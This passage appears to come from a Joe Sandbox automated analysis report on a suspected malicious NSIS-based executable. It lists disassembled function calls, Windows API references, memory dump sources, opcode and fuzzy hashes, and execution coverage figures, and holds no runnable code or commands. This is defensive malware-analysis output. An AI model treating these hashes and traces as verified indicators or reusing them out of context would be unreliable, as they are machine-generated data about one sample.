                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nswC272.tmp$C:\Users\user\AppData\Local\Temp\nswC272.tmp\System.dll
                                                                                                              • API String ID: 3109718747-1180585899
                                                                                                              • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                              • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                              • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                              • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2259069122.00000000701A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701A0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2259033794.00000000701A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259096559.00000000701A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259132821.00000000701A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701a0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeGlobal
                                                                                                              • String ID:
                                                                                                              • API String ID: 2979337801-0
                                                                                                              • Opcode ID: 25d4e79fc655301e5b9b7f90fe59b8886da8e3127b94169f09008c2ae25d54b7
                                                                                                              • Instruction ID: b6db8b706d78f69cb14f5a395c63677217b98aad08168d09e1100d617ca427e7
                                                                                                              • Opcode Fuzzy Hash: 25d4e79fc655301e5b9b7f90fe59b8886da8e3127b94169f09008c2ae25d54b7
                                                                                                              • Instruction Fuzzy Hash: F65107FED060D59ECB029FA4C9405AE7BBAFF44314F23465EE406E3B04D670AE8187A1
                                                                                                              APIs
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701A24D6
                                                                                                                • Part of subcall function 701A122C: lstrcpynW.KERNEL32(00000000,?,701A12DF,00000019,701A11BE,-000000A0), ref: 701A123C
                                                                                                              • GlobalAlloc.KERNEL32(00000040), ref: 701A245C
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 701A2477
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2259069122.00000000701A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701A0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2259033794.00000000701A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259096559.00000000701A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259132821.00000000701A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701a0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                              • String ID:
                                                                                                              • API String ID: 4216380887-0
                                                                                                              • Opcode ID: fae0fb0fa9840edf400b40e22afefbb1803affe540842d63f4cd702dcb870fc9
                                                                                                              • Instruction ID: 83c76092d5daae50eca4768b17ede1cd26117b3f018f21c9d025c6351452b213
                                                                                                              • Opcode Fuzzy Hash: fae0fb0fa9840edf400b40e22afefbb1803affe540842d63f4cd702dcb870fc9
                                                                                                              • Instruction Fuzzy Hash: 2D41CEF9008305DFC7149F29D844A6E77F8FF9C320F2148AEF546A6A51EB74A848DB61
                                                                                                              APIs
                                                                                                              • GetDC.USER32(?), ref: 00401DBC
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 3808545654-0
                                                                                                              • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                              • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                              • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                              • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                              APIs
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,701A21EC,?,00000808), ref: 701A1635
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,701A21EC,?,00000808), ref: 701A163C
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,701A21EC,?,00000808), ref: 701A1650
                                                                                                              • GetProcAddress.KERNEL32(701A21EC,00000000), ref: 701A1657
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701A1660
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2259069122.00000000701A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701A0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2259033794.00000000701A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259096559.00000000701A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259132821.00000000701A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701a0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1148316912-0
                                                                                                              • Opcode ID: 7416c729a5f036fd86526c160fe5f02c896efe32d51da87a9e84682df8155198
                                                                                                              • Instruction ID: 5dc3b5037dc76e5507dcddeea03d84d6ab353481fda81bfd639ade5145ceb625
                                                                                                              • Opcode Fuzzy Hash: 7416c729a5f036fd86526c160fe5f02c896efe32d51da87a9e84682df8155198
                                                                                                              • Instruction Fuzzy Hash: AFF0A2731061387BD62117AB8D4CDDBBE9CDFCB2F5B210225F718915A085615D01D7F1
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1849352358-0
                                                                                                              • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                              • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                              • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                              • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Timeout
                                                                                                              • String ID: !
                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                              • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                              • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 2659869361-4083868402
                                                                                                              • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                              • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                              • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                              • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                              APIs
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405D76
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                              • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405E1E
                                                                                                              • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00405E2E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                              • String ID: 0_B
                                                                                                              • API String ID: 3248276644-2128305573
                                                                                                              • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                              • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                              Strings
                                                                                                              • Error launching installer, xrefs: 004059E4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                              • String ID: Error launching installer
                                                                                                              • API String ID: 3712363035-66219284
                                                                                                              • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                              • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,00403A1A,75573420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 1100898210-4083868402
                                                                                                              • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                              • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                              • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                              • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xXUnP7uCBJ.exe,C:\Users\user\Desktop\xXUnP7uCBJ.exe,80000000,00000003), ref: 00405D0F
                                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xXUnP7uCBJ.exe,C:\Users\user\Desktop\xXUnP7uCBJ.exe,80000000,00000003), ref: 00405D1F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharPrevlstrlen
                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                              • API String ID: 2709904686-1876063424
                                                                                                              • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                              • Instruction ID: 65148869c9b5617484fe42b3676c909fd92059a2a8224d2a454660f99163d925
                                                                                                              • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                              • Instruction Fuzzy Hash: A3D0A7B7410920EAD3126B04DC04D9F73ACEF51300B46843BE840A7171D7785CD18BEC
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 701A116A
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701A11C7
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701A11D9
                                                                                                              • GlobalFree.KERNEL32(?), ref: 701A1203
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2259069122.00000000701A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701A0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2259033794.00000000701A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259096559.00000000701A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259132821.00000000701A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701a0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1780285237-0
                                                                                                              • Opcode ID: 3cbddd5f35cdb65674aa8f1bb5e8895a2f5231f9fb251be27cfc9b442a759f6a
                                                                                                              • Instruction ID: f7e946e8cf110cc174f3825cdcd3312192f99295daca085569c44d7a20333ce0
                                                                                                              • Opcode Fuzzy Hash: 3cbddd5f35cdb65674aa8f1bb5e8895a2f5231f9fb251be27cfc9b442a759f6a
                                                                                                              • Instruction Fuzzy Hash: 323181FA9042019FD3008F75DE55B2D7BF9EB55310722052AFA46D7B64E774D80187A0
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 190613189-0
                                                                                                              • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                              • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                              • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                              • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:10.4%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:2.5%
                                                                                                              Total number of Nodes:238
                                                                                                              Total number of Limit Nodes:14
